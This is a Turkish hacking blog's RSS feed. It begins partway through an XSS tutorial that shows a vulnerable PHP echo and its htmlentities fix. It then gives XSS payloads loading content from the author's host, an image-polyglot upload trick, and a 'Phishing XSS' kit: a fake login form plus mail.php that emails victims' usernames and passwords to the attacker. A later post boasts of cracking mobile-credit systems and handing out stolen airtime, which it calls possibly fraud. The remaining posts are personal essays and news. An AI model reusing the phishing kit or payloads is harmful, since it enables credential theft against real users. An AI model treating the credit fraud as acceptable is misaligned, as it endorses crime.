<p>XSS açığını oluşturan hata, index.html olarak kaydettiğimiz kodların 16. satırında bulunuyor. Şimdi ufak bir düzenlemeyle XSS&#8217;nin oluşmasını engellemek için kodda nasıl bir değişiklik yapacağımızı (fixlemeyi) göreceğiz.</p>
<pre name="code" class="php">
< body>
<span class="alerte">Arama Sonucu  :</span>&nbsp;<strong>< ?php echo $_POST['Vulnerability']; ?></strong>&nbsp;
< /body></pre>
<p>aşağıdakiyle değiştirin.</p>
<pre name="code" class="php">
< body>
<span class="alerte">Arama Sonucu  :</span>&nbsp;<strong>< ?php
if(isset($_POST['Vulnerability'])) { echo htmlentities($_POST['Vulnerability']); } ?></strong>&nbsp;
< /body>
</pre>
<p>Bu fonksiyonları da bilmenizde fayda var;</p>
<pre name="code" class="php">
other function:
htmlentities() quotes
strip_tags()
</pre>
<h3><span style="color: #99cc00;"><strong><span style="text-decoration: underline;"><a id="saldiri_yontemleri" name="saldiri_yontemleri">Bölüm #5 | XSS&#8217;de Saldırı Teknikleri</a></span></strong></span></h3>
<p>Resim dosyasıyla saldırı kodu:</p>
<pre name="code" class="php">&lt;img src="http://knbykl.org/resim_xss.png"&gt;</pre>
<p>Flash dosyasıyla saldırı kodu:</p>
<pre name="code" class="php">&lt;embed src="http://knbykl.org/flash.swf"&gt;</pre>
<p>Yeni bi sayfa açtırmak için gereken kod:</p>
<pre name="code" class="php">&lt;script&gt;window.open( "http://www.knbykl.org/own.html" )&lt;/script&gt;</pre>
<p>Hata sayfasına:</p>
<pre name="code" class="php">&lt;meta http-equiv="refresh" content="0; url=http://knbykl.org/own.html" /&gt;</pre>
<h3><span style="color: #99cc00;"><span style="text-decoration: underline;"><strong><a id="bypass" name="bypass">Bölüm #6 | Saldırıyı Filtreleme (Bypass)</a></strong></span></span></h3>
<p>XSS saldırı tekniklerinin diğer örneklerini görmek için <a href="http://knbykl.org/bypass.txt"><b>buraya</b></a> tıklayın.</p>
<h3><span style="color: #99cc00;"><span style="text-decoration: underline;"><strong><a id="xss_upload" name="xss_upload">Bölüm #7 | XSS Upload İşlemi</a></strong></span></span></h3>
<p>Biryerlerden resim bulun veya paintte birşeyler karalayıp bunu &#8220;resim.gif&#8221; adında kaydedin. Ardından;</p>
<p>resim.gif &gt; Sağ tıkla &gt; Birlikte Aç &gt; Notepad</p>
<p>Yani resim.gif dosyamızı notepad ile açıp, içinde karmaşık ifadelerin  hepsini siliyoruz ;</p>
<p>ve bu kodu yapıştırıp, kaydederek XSS kodumuzu resim formatına dönüştürmüş oluyoruz.</p>
<p>.GIF formatında kaydettim ama sizler istediğiniz resim formatında kaydedebilirsiniz. Aşağıda bir kaç örnek kod yazdım.</p>
<p>PNG = ‰PNG<br />
GIF = GIF89a<br />
BMP = BMFÖ</p>
<h3><span style="color: #99cc00;"><span style="text-decoration: underline;"><strong><a id="xss_phishing" name="xss_phishing">Bölüm #8 | Phishing XSS</a></strong></span></span></h3>
<p>Phishing XSS, konusunda fazla detaya girmiyorum, zaten işin mantığını kavrayanlar &#8220;Phishing XSS&#8217;nin ne kadar tehlikeli olacağını anlayabilir.Test amaçlı üye giriş formu kodladım, onu örnek olarak kullanabilirsiniz. Kurban eğer kullanıcı adını ve şifresini girerse, bilgileri mail olarak adresinize gelecektir.</p>
<pre name="code" class="php">

Kullanıcı adınızı ve şifrenizi girin:
<form action="http://knbykl.org/mail.php">
<table>
<tr>
<td>Kullanıcı Adı:</td>
<td>
<input type=text length=20 name=login/>
</td>
</tr>
<tr>
<td>Şifre:</td>
<td>
<input type=text length=20 name=password/>
</td>
</tr>
</table>
<input type=submit value=          OK          />
</form>
</pre>
<p>Bunu da mail.php olarak kaydedip, serverınıza yükleyin.</p>
<pre name="code" class="php">
< !DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
< html xmlns="http://www.w3.org/1999/xhtml">
< head>
< meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
< title>Hata< /title>
< /head>
< ?php
$login = $HTTP_GET_VARS["login"];
$password = $HTTP_GET_VARS["password"];
mail("info@knbykl.org", "Cookie stealed ! - thx knbykl =)", $password , $login );
?>
< body>
<h2><strong>Hata</strong> -<strong> Server Loading...</strong></h2>

< /body>
< /html>
</pre>
<p>Not: Kodları bilgisayarınıza kaydettikten sonra düzeltmeniz gereken yerleri düzeltmezseniz, istediğiniz sonucu alamazsınız. Kodların hiçbirinde sorun yok, düzgün çalışıyor. </p>
]]></content:encoded>
			<wfw:commentRss>http://www.knbykl.org/cross-site-scripting-saldirisi-ve-savunma-yontemleri/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>White Angel ve Yaşamın Amacı</title>
		<link>http://www.knbykl.org/white-angel-ve-yasamin-amaci/</link>
		<comments>http://www.knbykl.org/white-angel-ve-yasamin-amaci/#comments</comments>
		<pubDate>Fri, 26 Mar 2010 03:43:59 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Advisories]]></category>
		<category><![CDATA[Angel]]></category>
		<category><![CDATA[hayat]]></category>
		<category><![CDATA[White]]></category>

		<guid isPermaLink="false">http://www.knbykl.org/?p=537</guid>
		<description><![CDATA[Bloga birşeyler yazmayalı yaklaşık 1 ay oldu. Hem bir kaç şey yazmak istedim hem de bloguma yeni bir tema hazırlamaya vakit buldum. İnsanların ailesine, çevresine zaman ayırması gerektiğini her daim söylüyorum, ama bir de şu şekilde düşünüyorum. Peki ya ben? Evet ben. Çevreme ve yakınımdakilere zaman ayırabiliyorum ama kendime ayıracak zaman bulamıyorum. İnsan öncelikle kendisine [...]]]></description>
			<content:encoded><![CDATA[<p><img class="alignnone size-full wp-image-538" title="white_angel_yasamin_amaci" src="http://www.knbykl.org/wp-content/uploads/2010/03/white_angel_yasamin_amaci.jpg" alt="" width="587" height="100" /><br />
Bloga birşeyler yazmayalı yaklaşık 1 ay oldu. Hem bir kaç şey yazmak istedim hem de bloguma yeni bir tema hazırlamaya vakit buldum.<span id="more-537"></span></p>
<p>İnsanların ailesine, çevresine zaman ayırması gerektiğini her daim söylüyorum, ama bir de şu şekilde düşünüyorum. Peki ya ben?</p>
<p>Evet ben. Çevreme ve yakınımdakilere zaman ayırabiliyorum ama kendime ayıracak zaman bulamıyorum. İnsan öncelikle kendisine bakmalı, sorgulamalı;</p>
<ul>
<li><strong>Ben neyim? </strong></li>
<li><strong>Neden yaşıyorum? </strong></li>
<li><strong>Şu anda ne yapıyorum? </strong></li>
<li><strong>Benim yaşımda olan insanlar şu anda ne yapıyor? </strong></li>
<li><strong>Ben yalnız mıyım?</strong></li>
<li><strong>Yalnızsam neden yalnızım? Yalnız değilsem yanımdakiler kim?</strong></li>
<li><strong>Hayat sadece internette gününün 20 saatini geçirmek mi?</strong></li>
<li><strong>Hayat senin için neyi ifade ediyor?</strong></li>
<li><strong>Eşine, çocuğuna değer veriyor musun?</strong></li>
</ul>
<p>işte aynen bu şekilde, kararlı ve dürüstçe. Başkası için değil, doğruları bulabilmek için kalbinden cevaplamalı bu soruları.</p>
<p>Bu soruları bir kağıda yazıp hepsini teker teker cevapladım, bir dahaki yazımda da cevaplarını aktarırım. Ben cevaplarımdan yola çıkarak White Angel temamı bloguma entegre ettim. Beyaz rengiyle, saflığı, temizliği ifade eden bir arayüz. Bakalım siz de beyaz yönünüzü bulabilecek misiniz?</p>
]]></content:encoded>
			<wfw:commentRss>http://www.knbykl.org/white-angel-ve-yasamin-amaci/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>Yokluğum</title>
		<link>http://www.knbykl.org/yoklugum/</link>
		<comments>http://www.knbykl.org/yoklugum/#comments</comments>
		<pubDate>Tue, 16 Mar 2010 11:15:42 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Konu Dışı]]></category>
		<category><![CDATA[aile]]></category>
		<category><![CDATA[hayat]]></category>
		<category><![CDATA[iş]]></category>
		<category><![CDATA[saygı]]></category>
		<category><![CDATA[sevgi]]></category>
		<category><![CDATA[yaşam]]></category>

		<guid isPermaLink="false">http://www.knbykl.org/?p=532</guid>
		<description><![CDATA[  Uzun süredir yazmadığımın farkındayım, ne bir haber ne de bir döküman yazabiliyorum. Şu yazımı bile arkadaşım aracılığıyla blogumda yayınlatıyorum. Her insan gibi benim de sosyal yaşamıma ve aileme vaktimi ayırdığımı bilmenizi isterim. Fazla gecikmeden daha özgün yazılarımı tekrardan yazmaya başlayacağım.]]></description>
			<content:encoded><![CDATA[<p>  Uzun süredir yazmadığımın farkındayım, ne bir haber ne de bir döküman yazabiliyorum. Şu yazımı bile arkadaşım aracılığıyla blogumda yayınlatıyorum. Her insan gibi benim de sosyal yaşamıma ve aileme vaktimi ayırdığımı bilmenizi isterim. Fazla gecikmeden daha özgün yazılarımı tekrardan yazmaya başlayacağım.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.knbykl.org/yoklugum/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Zenginden Alıp, Fakire Dağıtmak</title>
		<link>http://www.knbykl.org/zenginden-alip-fakire-dagitmak/</link>
		<comments>http://www.knbykl.org/zenginden-alip-fakire-dagitmak/#comments</comments>
		<pubDate>Sat, 27 Feb 2010 02:08:22 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Konu Dışı]]></category>
		<category><![CDATA[Bedava Avea Kontör]]></category>
		<category><![CDATA[Bedava Kontör Gönder]]></category>
		<category><![CDATA[Bedava Turkcell Kontör]]></category>
		<category><![CDATA[Bedava Vodafone Kontör]]></category>

		<guid isPermaLink="false">http://www.knbykl.org/?p=527</guid>
		<description><![CDATA[Uzun zamandır birşey için uğraşıyordum ve sonunda başarının verdiği mutluluğu sizlerle paylaşıyorum. Başlıkta yanlış yazmıyor, gerçekten kontöre ihtiyacı olanlar Turkcell,Avea,Vodafone farketmeksizin kontörlerini yollayabiliyorum. İlk başlarda bir üyeliği ele geçirmeyle başlayan cracking işleminde 2 arkadaşımın da yardımıyla şu anda ayrı 3 sistemi yönetebiliyorum. Belki dolandırıcılığa giriyor ama &#8220;zenginden alıp, halka dağıtma&#8221; dedikleri şeyi uyguluyorum. Sistemlerin belirli [...]]]></description>
			<content:encoded><![CDATA[<p><img class="alignnone size-full wp-image-528" title="bedava_kontor" src="http://www.knbykl.org/wp-content/uploads/2010/02/bedava_kontor.jpg" alt="" width="615" height="100" /><br />
Uzun zamandır birşey için uğraşıyordum ve sonunda başarının verdiği mutluluğu sizlerle paylaşıyorum. Başlıkta yanlış yazmıyor, gerçekten kontöre ihtiyacı olanlar Turkcell,Avea,Vodafone farketmeksizin kontörlerini yollayabiliyorum. <span id="more-527"></span></p>
<p>İlk başlarda bir üyeliği ele geçirmeyle başlayan cracking işleminde 2 arkadaşımın da yardımıyla şu anda ayrı 3 sistemi yönetebiliyorum. Belki dolandırıcılığa giriyor ama &#8220;zenginden alıp, halka dağıtma&#8221; dedikleri şeyi uyguluyorum.</p>
<p>Sistemlerin belirli bir kredisi var, şu an yaklaşık eski parayla 4 milyar karşılığı kontör transfer hakkına sahibim. Bunu da sanırım en iyi dağıtmanın yolu bloguma yazmaktı. Herhangi bir suçlama yapamayacaklarının garantisini verebilirim, ayrıca parça kontör gelen numarayı da geri aramamalısınız.</p>
<p>Yapmanız gereken sadece yorum alanına telefon numaranızı ve hangi operatöre bağlı olduğunuzu belirtmek. 100 kontör ve üzeri de yükleme şansım var fakat sınırlama olarak 20 kontör ideal diye düşünüyorum, en azından daha fazla kişi yararlanmalı, belirli bir süreden sonra da bu miktarı 10 kontöre indirebilirim. Burayı kesinlikle bağımlılık haline getirmeyin, inanın bana bu insanlardan koparabildiğimiz kadarını koparmaya çalıştım, çünkü bahsettiğim kişiler ve firmalar insanları zehirlemek gibi pis işlerle de ilgileniyorlar.</p>
<p>Ayrıca yorum alanına numaranızı yazdığınız zaman, onaylanmadan gözükmeyeceği için, onaylarken de numaranızı gizleyeceğimden emin olabilirsiniz.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.knbykl.org/zenginden-alip-fakire-dagitmak/feed/</wfw:commentRss>
		<slash:comments>11</slash:comments>
		</item>
		<item>
		<title>Black Hawk Safety Net</title>
		<link>http://www.knbykl.org/black-hawk-safety-net/</link>
		<comments>http://www.knbykl.org/black-hawk-safety-net/#comments</comments>
		<pubDate>Thu, 11 Feb 2010 15:30:57 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Haberler]]></category>
		<category><![CDATA[Çin Bilişim Suçları]]></category>
		<category><![CDATA[Hacker]]></category>

		<guid isPermaLink="false">http://www.knbykl.org/?p=524</guid>
		<description><![CDATA[Black Hawk Safety Net&#8217;i daha önce duyanlarınız vardır. Ağdaki bilgisayarlara sızma, sistem açıklarından yararlanarak sistemi çökertme, bilgi hırsızlığı vb. konularda eğitimler veriyorlardı. Bu yüzden de Çin Bilişim Suçları Polisi grubun faaliyetlerini durdurmak için çalışmalar başlatmıştı. Bunu grup kendisi de açıklamıştı zaten. Aslında herşey sitede bulunan 3 yöneticinin bilgisayarın nasıl çökertilmesi gerektiğini üyelerine öğretmesiyle başladı. Bu [...]]]></description>
			<content:encoded><![CDATA[<p><img class="alignnone size-full wp-image-525" title="Black Hawk Safety Net" src="http://www.knbykl.org/wp-content/uploads/2010/02/Black-Hawk-Safety-Net.jpg" alt="" width="615" height="100" /></p>
<p>Black Hawk Safety Net&#8217;i daha önce duyanlarınız vardır. Ağdaki bilgisayarlara sızma, sistem açıklarından yararlanarak sistemi çökertme, bilgi hırsızlığı vb. konularda eğitimler veriyorlardı.<span id="more-524"></span> Bu yüzden de Çin Bilişim Suçları Polisi grubun faaliyetlerini durdurmak için çalışmalar başlatmıştı. Bunu grup kendisi de açıklamıştı zaten.</p>
<p>Aslında herşey sitede bulunan 3 yöneticinin bilgisayarın nasıl çökertilmesi gerektiğini üyelerine öğretmesiyle başladı. Bu da Çin&#8217;de suç sayıldığı için geçen sene başladı soruşturma.</p>
<p>Polis;</p>
<ul>
<li>1 otomobil</li>
<li>9 web sunucusu</li>
<li>5 bilgisayara</li>
</ul>
<p>el koyduğunu açıkladı.</p>
<p>2005&#8242;te kurulan sitesinin 200 bine yakın üyesi var, bunların 15 bine yakını belirli ücret karşılığı özel hazırlanan hacking dökümanlarını alabilmek için 1.02 milyon abd doları para ödediler.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.knbykl.org/black-hawk-safety-net/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Türkiye&#8217;de 6123 Site Kapatıldı</title>
		<link>http://www.knbykl.org/turkiyede-6123-site-kapatildi/</link>
		<comments>http://www.knbykl.org/turkiyede-6123-site-kapatildi/#comments</comments>
		<pubDate>Sun, 31 Jan 2010 02:17:55 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Haberler]]></category>
		<category><![CDATA[Bu siteye erişim mahkeme kararıyla engellenmiştir]]></category>
		<category><![CDATA[mahkeme kararı]]></category>
		<category><![CDATA[site kapatma]]></category>

		<guid isPermaLink="false">http://www.knbykl.org/?p=520</guid>
		<description><![CDATA[Türkiye’de erişim engelli internet sitesi sayısı 6 bini geçti. Sadece son dört ayda Türkiye’den erişimi engellenen web sitesi sayısı 3 bine yakın. Erişime engellenen sitelerin yarısı 5651 sayılı İnternet Kanunu’nda sıralanan gerekçelerle kapatılırken, diğer yarısına erişim çoğunlukla MÜ-YAP’ın şikayeti üzerine 5864 sayılı Fikir ve Sanat Eserleri Kanunu Ek Madde 4 uyarınca engellendi. Mahkeme Kararı Yazanlar [...]]]></description>
			<content:encoded><![CDATA[<p>Türkiye’de erişim engelli internet sitesi sayısı 6 bini geçti. Sadece son dört ayda Türkiye’den erişimi engellenen web sitesi sayısı 3 bine yakın.<br />
<img class="alignnone size-full wp-image-521" title="turkiyede_kapatilan_siteler" src="http://www.knbykl.org/wp-content/uploads/2010/01/turkiyede_kapatilan_siteler.jpg" alt="turkiyede_kapatilan_siteler" width="615" height="100" /><br />
<span id="more-520"></span></p>
<p>Erişime engellenen sitelerin yarısı 5651 sayılı İnternet Kanunu’nda sıralanan gerekçelerle kapatılırken, diğer yarısına erişim çoğunlukla MÜ-YAP’ın şikayeti üzerine 5864 sayılı Fikir ve Sanat Eserleri Kanunu Ek Madde 4 uyarınca engellendi.</p>
<ul>
<li>Mahkeme Kararı Yazanlar (5550)</li>
<li>Mahkeme Kararı Yazmayanlar (550)</li>
<li>Erişim Engeli Kaldırılanlar (26)</li>
<li>Engellenen WordPress Blogları (17)</li>
<li>Engellenen Blogger/Blogspot Blogları (29)</li>
</ul>
<p><em>Not: Bu bilgiler 1 Şubat 2010 tarihinde alınmıştır</em></p>
<p>651 sayılı yasa uyarınca engellenen sitelerin büyük kısmı cinsel içeriği nedeniyle erişime kapatıldı. Onu bahis ve kumar oynatma ve teşvik etme, Atatürk aleyhine işlenen suçlar, uyuşturucuya teşvik etme, fuhuş da diğer gerekçeler arasında.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.knbykl.org/turkiyede-6123-site-kapatildi/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
	</channel>
</rss>
